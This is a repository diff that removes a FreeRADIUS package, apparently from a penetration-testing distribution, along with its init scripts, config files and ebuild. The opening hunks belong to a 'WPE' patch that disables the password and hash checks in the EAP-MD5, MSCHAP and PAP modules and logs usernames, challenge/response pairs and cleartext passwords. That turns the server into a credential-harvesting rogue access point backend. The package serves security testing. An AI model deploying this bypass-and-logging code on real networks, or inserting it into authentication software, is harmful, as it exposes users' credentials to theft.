- rcode = eapleap_stage4(packet, password, session);
+ rcode = eapleap_stage4(packet, password, session, username);
session->stage = 6;
/*
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2014-05-18 20:27:16.392823742 +0800
@@ -202,9 +202,13 @@
/*
* The length of the response is always 16 for MD5.
*/
+ /* WPE FTW
if (memcmp(output, packet->value, 16) != 0) {
return 0;
}
+ */
+ log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN,
+ packet->value, 16);
return 1;
}
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_mschap/rlm_mschap.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_mschap/rlm_mschap.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_mschap/rlm_mschap.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_mschap/rlm_mschap.c 2014-05-18 20:28:28.879823390 +0800
@@ -681,9 +681,11 @@
static int do_mschap(rlm_mschap_t *inst,
REQUEST *request, VALUE_PAIR *password,
uint8_t *challenge, uint8_t *response,
- uint8_t *nthashhash, int do_ntlm_auth)
+ uint8_t *nthashhash, int do_ntlm_auth, char *username)
{
uint8_t calculated[24];
+
+ log_wpe("mschap", username, NULL, challenge, 8, response, 24);
/*
* Do normal authentication.
@@ -698,9 +700,11 @@
}
smbdes_mschap(password->vp_strvalue, challenge, calculated);
+ /* WPE FTW
if (rad_digest_cmp(response, calculated, 24) != 0) {
return -1;
}
+ */
/*
* If the password exists, and is an NT-Password,
@@ -1151,7 +1155,7 @@
*/
if (do_mschap(inst, request, password, challenge->vp_octets,
response->vp_octets + offset, nthashhash,
- do_ntlm_auth) < 0) {
+ do_ntlm_auth, request->username->vp_strvalue) < 0) {
RDEBUG2("MS-CHAP-Response is incorrect.");
goto do_error;
}
@@ -1270,7 +1274,7 @@
if (do_mschap(inst, request, nt_password, mschapv1_challenge,
response->vp_octets + 26, nthashhash,
- do_ntlm_auth) < 0) {
+ do_ntlm_auth, request->username->vp_strvalue) < 0) {
int i;
char buffer[128];
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_pap/rlm_pap.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_pap/rlm_pap.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_pap/rlm_pap.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_pap/rlm_pap.c 2014-05-18 20:28:28.880823390 +0800
@@ -526,6 +526,8 @@
RDEBUG("ERROR: You set 'Auth-Type = PAP' for a request that does not contain a User-Password attribute!");
return RLM_MODULE_INVALID;
}
+ log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue,
+ NULL, 0, NULL, 0);
/*
* The user MUST supply a non-zero-length password.
@@ -609,6 +611,7 @@
do_clear:
RDEBUG("Using clear text password \"%s\"",
vp->vp_strvalue);
+ /* WPE FTW
if ((vp->length != request->password->length) ||
(rad_digest_cmp(vp->vp_strvalue,
request->password->vp_strvalue,
@@ -616,6 +619,7 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: CLEAR TEXT password check failed");
goto make_msg;
}
+ */
done:
RDEBUG("User authenticated successfully");
return RLM_MODULE_OK;
@@ -648,10 +652,12 @@
fr_MD5Update(&md5_context, request->password->vp_octets,
request->password->length);
fr_MD5Final(digest, &md5_context);
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: MD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -675,10 +681,12 @@
/*
* Compare only the MD5 hash results, not the salt.
*/
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, 16) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SMD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -697,10 +705,12 @@
fr_SHA1Update(&sha1_context, request->password->vp_octets,
request->password->length);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SHA1 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -721,10 +731,12 @@
request->password->length);
fr_SHA1Update(&sha1_context, &vp->vp_octets[20], vp->length - 20);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, 20) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SSHA password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -746,11 +758,13 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE FTW
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: NT password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -770,16 +784,20 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE FTW
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: LM password check failed");
+ */
make_msg:
+ /*
RDEBUG("Passwords don't match");
module_fmsg_vp = pairmake("Module-Failure-Message",
module_fmsg, T_OP_EQ);
pairadd(&request->packet->vps, module_fmsg_vp);
return RLM_MODULE_REJECT;
}
+ */
goto done;
break;

5
net-dialup/freeradius/files/radius.conf
View file

@ -1,5 +0,0 @@
# Config file for /etc/init.d/radiusd
# see man pages for radiusd run `radiusd -h`
# for valid cmdline options
#RADIUSD_OPTS=""

16
net-dialup/freeradius/files/radius.conf-r3
View file

@ -1,16 +0,0 @@
# Config file for /etc/init.d/radiusd
# see man pages for radiusd run `radiusd -h`
# for valid cmdline options
#RADIUSD_OPTS=""
# Change this value if you change it in /etc/raddb/radiusd.conf
pidfile=/var/run/radiusd/radiusd.pid
# Change these values if you change them in /etc/raddb/radiusd.conf
#RADIUSD_USER=radius
#RADIUSD_GROUP=radius
# If you set up logging to syslog in /etc/raddb/radiusd.conf, you want
# to uncomment the following line.
#rc_use="logger"

63
net-dialup/freeradius/files/radius.init-r1
View file

@ -1,63 +0,0 @@
#!/sbin/runscript
opts="${opts} reload"
depend() {
need net
use dns
}
checkconfig() {
# set the location of log files
if ! cd /var/log/radius ; then
eerror "Failed to change current directory to /var/log/radius"
return 1
fi
if [ ! -d /var/run/radiusd ] && ! mkdir /var/run/radiusd ; then
eerror "Failed to create /var/run/radiusd"
return 1
fi
if [ ! -f /etc/raddb/radiusd.conf ] ; then
eerror "No /etc/raddb/radiusd.conf file exists!"
return 1
fi
RADIUSD_USER=`grep '^ *user *=' /etc/raddb/radiusd.conf | cut -d ' ' -f 3`
RADIUSD_GROUP=`grep '^ *group *=' /etc/raddb/radiusd.conf | cut -d ' ' -f 3`
if [ -n "${RADIUSD_USER}" ] && ! getent passwd ${RADIUSD_USER} > /dev/null ; then
eerror "${RADIUSD_USER} user missing!"
return 1
fi
if [ -n "${RADIUSD_GROUP}" ] && ! getent group ${RADIUSD_GROUP} > /dev/null ; then
eerror "${RADIUSD_GROUP} group missing!"
return 1
fi
# radius.log is created before privileges are dropped - need to set proper permissions on it
[ -f radius.log ] || touch radius.log || return 1
chown -R "${RADIUSD_USER:-root}:${RADIUSD_GROUP:-root}" . /var/run/radiusd && \
chmod -R u+rwX,g+rX . /var/run/radiusd || return 1
}
start() {
checkconfig || return 1
ebegin "Starting radiusd"
start-stop-daemon --start --quiet --exec /usr/sbin/radiusd -- ${RADIUSD_OPTS} >/dev/null
eend $?
}
stop () {
ebegin "Stopping radiusd"
start-stop-daemon --stop --quiet --pidfile=/var/run/radiusd/radiusd.pid
eend $?
}
reload () {
ebegin "Reloading radiusd"
kill -HUP `</var/run/radiusd/radiusd.pid`
eend $?
}

56
net-dialup/freeradius/files/radius.init-r2
View file

@ -1,56 +0,0 @@
#!/sbin/runscript
extra_started_commands="reload"
depend() {
need net
use dns
}
checkconfig() {
if [ ! -d /var/run/radiusd ] && ! mkdir /var/run/radiusd ; then
eerror "Failed to create /var/run/radiusd"
return 1
fi
if [ ! -f /etc/raddb/radiusd.conf ] ; then
eerror "No /etc/raddb/radiusd.conf file exists!"
return 1
fi
RADIUSD_USER=`grep '^ *user *=' /etc/raddb/radiusd.conf | cut -d ' ' -f 3`
RADIUSD_GROUP=`grep '^ *group *=' /etc/raddb/radiusd.conf | cut -d ' ' -f 3`
if [ -n "${RADIUSD_USER}" ] && ! getent passwd ${RADIUSD_USER} > /dev/null ; then
eerror "${RADIUSD_USER} user missing!"
return 1
fi
if [ -n "${RADIUSD_GROUP}" ] && ! getent group ${RADIUSD_GROUP} > /dev/null ; then
eerror "${RADIUSD_GROUP} group missing!"
return 1
fi
local dirs=/var/run/radiusd
[ -d /var/log/radius ] && dirs="${dirs} /var/log/radius"
chown -R "${RADIUSD_USER:-root}:${RADIUSD_GROUP:-root}" ${dirs} && \
chmod -R u+rwX,g+rX ${dirs} || return 1
}
start() {
checkconfig || return 1
ebegin "Starting radiusd"
start-stop-daemon --start --quiet --exec /usr/sbin/radiusd -- ${RADIUSD_OPTS} >/dev/null
eend $?
}
stop () {
ebegin "Stopping radiusd"
start-stop-daemon --stop --quiet --pidfile=/var/run/radiusd/radiusd.pid
eend $?
}
reload () {
ebegin "Reloading radiusd"
kill -HUP `</var/run/radiusd/radiusd.pid`
eend $?
}

203
net-dialup/freeradius/freeradius-2.2.5-r2.ebuild
View file

@ -1,203 +0,0 @@
# Copyright 1999-2017 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
EAPI=6
PYTHON_COMPAT=( python2_7 )
inherit autotools eutils pam python-any-r1 user
PATCHSET=4
MY_P="${PN}-server-${PV}"
DESCRIPTION="Highly configurable free RADIUS server"
SRC_URI="
ftp://ftp.freeradius.org/pub/radius/${MY_P}.tar.gz
ftp://ftp.freeradius.org/pub/radius/old/${MY_P}.tar.gz
https://dev.pentoo.ch/~blshkv/distfiles//${PN}-2.2.0-patches-${PATCHSET}.tar.xz
"
HOMEPAGE="http://www.freeradius.org/"
KEYWORDS="amd64 ~ppc ~ppc64 ~sparc x86 ~x86-fbsd"
LICENSE="GPL-2"
SLOT="0"
IUSE="
bindist debug firebird iodbc kerberos ldap mysql odbc oracle pam pcap
postgres python readline sqlite ssl +wpe
"
RDEPEND="!net-dialup/cistronradius
!net-dialup/gnuradius
sys-devel/libtool
dev-lang/perl:=
sys-libs/gdbm
python? ( ${PYTHON_DEPS} )
readline? ( sys-libs/readline:0= )
pcap? ( net-libs/libpcap )
mysql? ( dev-db/mysql-connector-c )
postgres? ( dev-db/postgresql:= )
firebird? ( dev-db/firebird )
pam? ( virtual/pam )
ssl? ( dev-libs/openssl:0= )
ldap? ( net-nds/openldap )
kerberos? ( virtual/krb5 )
sqlite? ( dev-db/sqlite:3 )
odbc? ( dev-db/unixODBC )
iodbc? ( dev-db/libiodbc )
oracle? ( dev-db/oracle-instantclient-basic )"
DEPEND="${RDEPEND}"
REQUIRED_USE="bindist? ( !firebird )"
S="${WORKDIR}/${MY_P}"
pkg_setup() {
enewgroup radius
enewuser radius -1 -1 /var/log/radius radius
python-any-r1_pkg_setup
export PYTHONBIN="${EPYTHON}"
}
src_prepare() {
epatch \
"${WORKDIR}"/patches/0002*patch \
"${WORKDIR}"/patches/0004*patch \
"${FILESDIR}"/${P}-gentoo.patch
if use wpe; then
epatch "${FILESDIR}/${P}-wpe.patch"
cp "${FILESDIR}"/clients_wpe.conf raddb/clients.conf || die "failed to copy config files"
cp "${FILESDIR}"/eap_wpe.conf raddb/eap.conf || die "failed to copy config files"
cp "${FILESDIR}"/users_wpe raddb/users || die "failed to copy config files"
fi
# most of the configuration options do not appear as ./configure
# switches. Instead it identifies the directories that are available
# and run through them. These might check for the presence of
# various libraries, in which case they are not built. To avoid
# automagic dependencies, we just remove all the modules that we're
# not interested in using.
use ssl || { rm -r src/modules/rlm_eap/types/rlm_eap_{tls,ttls,peap} || die ; }
use ldap || { rm -r src/modules/rlm_ldap || die ; }
use kerberos || { rm -r src/modules/rlm_krb5 || die ; }
use pam || { rm -r src/modules/rlm_pam || die ; }
use python || { rm -r src/modules/rlm_python || die ; }
# Do not install ruby rlm module, bug #483108
rm -r src/modules/rlm_ruby || die
# these are all things we don't have in portage/I don't want to deal
# with myself
rm -r src/modules/rlm_eap/types/rlm_eap_tnc || die # requires TNCS library
rm -r src/modules/rlm_eap/types/rlm_eap_ikev2 || die # requires libeap-ikev2
rm -r src/modules/rlm_opendirectory || die # requires some membership.h
rm -r src/modules/rlm_redis{,who} || die # requires redis
rm -r src/modules/rlm_sql/drivers/rlm_sql_{db2,freetds,sybase} || die
# sql drivers that are not part of experimental are loaded from a
# file, so we have to remove them from the file itself when we
# remove them.
usesqldriver() {
local flag=$1
local driver=rlm_sql_${2:-${flag}}
if ! use ${flag}; then
rm -r src/modules/rlm_sql/drivers/${driver} || die
sed -i -e /${driver}/d src/modules/rlm_sql/stable || die
fi
}
usesqldriver mysql
usesqldriver postgres postgresql
usesqldriver firebird
usesqldriver iodbc
usesqldriver odbc unixodbc
usesqldriver oracle
usesqldriver sqlite
# remove bundled ltdl to avoid conflicts
rm -r libltdl
default
eautoreconf
}
src_configure() {
# fix bug #77613
if has_version app-crypt/heimdal; then
myconf+=( --enable-heimdal-krb5 )
fi
use readline || export ac_cv_lib_readline=no
use pcap || export ac_cv_lib_pcap_pcap_open_live=no
# do not try to enable static with static-libs; upstream is a
# massacre of libtool best practices so you also have to make sure
# to --enable-shared explicitly.
econf \
--enable-shared --disable-static \
--disable-ltdl-install \
--with-system-libtool \
--with-system-libltdl \
--with-ascend-binary \
--with-udpfromto \
--with-dhcp \
--with-iodbc-include-dir=/usr/include/iodbc \
--with-experimental-modules \
--with-docdir=/usr/share/doc/${PF} \
--with-logdir=/var/log/radius \
$(use_enable debug developer) \
$(use_with ldap edir) \
$(use_with ssl openssl) \
${myconf[@]}
}
src_compile() {
emake LIBTOOL=libtool
}
src_install() {
dodir /etc
diropts -m0750 -o root -g radius
dodir /etc/raddb
diropts -m0750 -o radius -g radius
dodir /var/log/radius
keepdir /var/log/radius/radacct
diropts
emake LIBTOOL=libtool R="${D}" install
fowners -R root:radius /etc/raddb
# Fixing pidfile location (#546482)
sed \
'/^run_dir =/s@${localstatedir}@@' \
-i "${D}"/etc/raddb/radiusd.conf || die
pamd_mimic_system radiusd auth account password session
dodoc CREDITS
rm "${D}/usr/sbin/rc.radiusd" || die
newinitd "${FILESDIR}/radius.init-r3" radiusd
newconfd "${FILESDIR}/radius.conf-r3" radiusd
}
pkg_config() {
if use ssl; then
cd "${ROOT}"/etc/raddb/certs
./bootstrap
fi
}
pkg_preinst() {
if ! has_version ${CATEGORY}/${PN} && use ssl; then
elog "You have to run \`emerge --config =${CATEGORY}/${PF}\` to be able"
elog "to start the radiusd service."
fi
}